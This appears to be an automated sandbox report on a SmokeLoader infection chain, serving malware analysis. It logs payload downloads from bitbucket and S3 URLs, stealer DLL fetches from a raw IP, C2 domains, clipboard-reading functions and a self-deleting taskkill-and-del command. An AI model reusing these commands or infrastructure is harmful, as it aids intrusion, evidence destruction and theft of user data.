Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3[1].dll.27.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: brandyjaggers.com

Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/build17.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/c8550f1d-c01f-4e90-b203-096040eab0a5/build17.exe?Signature=d1Q4kDrNefh8flM56O9HjpukLbc%3D&Expires=1635245205&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=_SHespFRgAw4oIOHESVoeGe0bV7HH580&response-content-disposition=attachment%3B%20filename%3D%22build17.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /@lilocc HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/03816c1a-92b3-4594-a3f6-6b3bedcc9b58/Taxao.exe?Signature=X6OA%2BfswTdnTnpZhN%2FTguu6wjTI%3D&Expires=1635244566&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=5qays.Q7NMcKdIvyy3pF9kf3XJHnSkKZ&response-content-disposition=attachment%3B%20filename%3D%22Taxao.exe%22 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: wedoepicsht.com
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: bitbucket.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190

Source: unknown

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.129.81:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.90.100:443 -> 192.168.2.7:49866 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.3040e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.AhB0i1fe7I.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.30a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.jajvesg.30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.370320300.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250161255.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.370514515.0000000004CC1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.312248919.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.357701243.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.313765796.0000000004C91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294319854.00000000030F1000.00000020.00020000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_00408F4C IsClipboardFormatAvailable,OpenClipboard,CloseClipboard,

19_2_00408F4C

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_00409086 GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,

19_2_00409086

System Summary:

Detected potential crypto function

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040B020	0_2_0040B020
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00409635	0_2_00409635
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040AACF	0_2_0040AACF
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040C16C	0_2_0040C16C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040B020	14_2_0040B020
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00409635	14_2_00409635
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040AACF	14_2_0040AACF
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040C16C	14_2_0040C16C
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004158DD	19_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004158DD	22_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004158DD	23_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004158DD	26_2_004158DD

PE file contains strange resources

Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A8D4.exe.3.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: A8D4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\explorer.exe

Section loaded: webio.dll

Uses 32bit PE files

Source: AhB0i1fe7I.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 0040A400 appears 99 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 0040F159 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: String function: 0040A400 appears 33 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401889 Sleep,NtTerminateProcess,	0_2_00401889
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F51 NtQuerySystemInformation,	0_2_00401F51
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402451 NtEnumerateKey,	0_2_00402451
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F5C NtQuerySystemInformation,	0_2_00401F5C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401865 Sleep,NtTerminateProcess,	0_2_00401865
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402402 NtOpenKey,NtEnumerateKey,	0_2_00402402
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402107 NtQuerySystemInformation,	0_2_00402107
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401829 Sleep,NtTerminateProcess,	0_2_00401829
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F31 NtQuerySystemInformation,	0_2_00401F31
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F3C NtQuerySystemInformation,	0_2_00401F3C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004023C8 NtOpenKey,NtEnumerateKey,	0_2_004023C8
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004021CD NtQuerySystemInformation,	0_2_004021CD
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004024E5 NtClose,	0_2_004024E5
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402091 NtQuerySystemInformation,	0_2_00402091
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F92 NtQuerySystemInformation,	0_2_00401F92
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401896 Sleep,NtTerminateProcess,	0_2_00401896
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040219C NtQuerySystemInformation,	0_2_0040219C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004018A5 Sleep,NtTerminateProcess,	0_2_004018A5
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004024A9 NtEnumerateKey,	0_2_004024A9
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004021AB NtQuerySystemInformation,	0_2_004021AB
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004018B8 NtTerminateProcess,	0_2_004018B8
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401889 Sleep,NtTerminateProcess,	14_2_00401889
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F51 NtQuerySystemInformation,	14_2_00401F51
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402451 NtEnumerateKey,	14_2_00402451
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F5C NtQuerySystemInformation,	14_2_00401F5C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401865 Sleep,NtTerminateProcess,	14_2_00401865
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402402 NtOpenKey,NtEnumerateKey,	14_2_00402402
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402107 NtQuerySystemInformation,	14_2_00402107
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401829 Sleep,NtTerminateProcess,	14_2_00401829
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F31 NtQuerySystemInformation,	14_2_00401F31
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F3C NtQuerySystemInformation,	14_2_00401F3C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004023C8 NtOpenKey,NtEnumerateKey,	14_2_004023C8
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004021CD NtQuerySystemInformation,	14_2_004021CD
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004024E5 NtClose,	14_2_004024E5
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402091 NtQuerySystemInformation,	14_2_00402091
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F92 NtQuerySystemInformation,	14_2_00401F92
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401896 Sleep,NtTerminateProcess,	14_2_00401896
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040219C NtQuerySystemInformation,	14_2_0040219C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004018A5 Sleep,NtTerminateProcess,	14_2_004018A5
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004024A9 NtEnumerateKey,	14_2_004024A9
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004021AB NtQuerySystemInformation,	14_2_004021AB
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004018B8 NtTerminateProcess,	14_2_004018B8

Source: AhB0i1fe7I.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 45C4.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: jajvesg.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SmartClock.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: AhB0i1fe7I.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jajvesg

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/26@41/12

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

File read: C:\Users\desktop.ini

Source: AhB0i1fe7I

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_004017BA FindResourceW,LoadResource,LockResource,SizeofResource,

19_2_004017BA

Source: AhB0i1fe7I.exe

Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\AhB0i1fe7I.exe 'C:\Users\user\Desktop\AhB0i1fe7I.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jajvesg C:\Users\user\AppData\Roaming\jajvesg
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\45C4.exe C:\Users\user~1\AppData\Local\Temp\45C4.exe
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A8D4.exe C:\Users\user~1\AppData\Local\Temp\A8D4.exe
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe 'C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe'
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\45C4.exe C:\Users\user~1\AppData\Local\Temp\45C4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe 'C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Windows\SysWOW64\taskkill.exe

Source: C:\Windows\explorer.exe

File created: C:\Users\user~1\AppData\Local\Temp\45C4.tmp

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_004035C8 CoInitializeEx,CoCreateInstance,

19_2_004035C8

Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.27.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
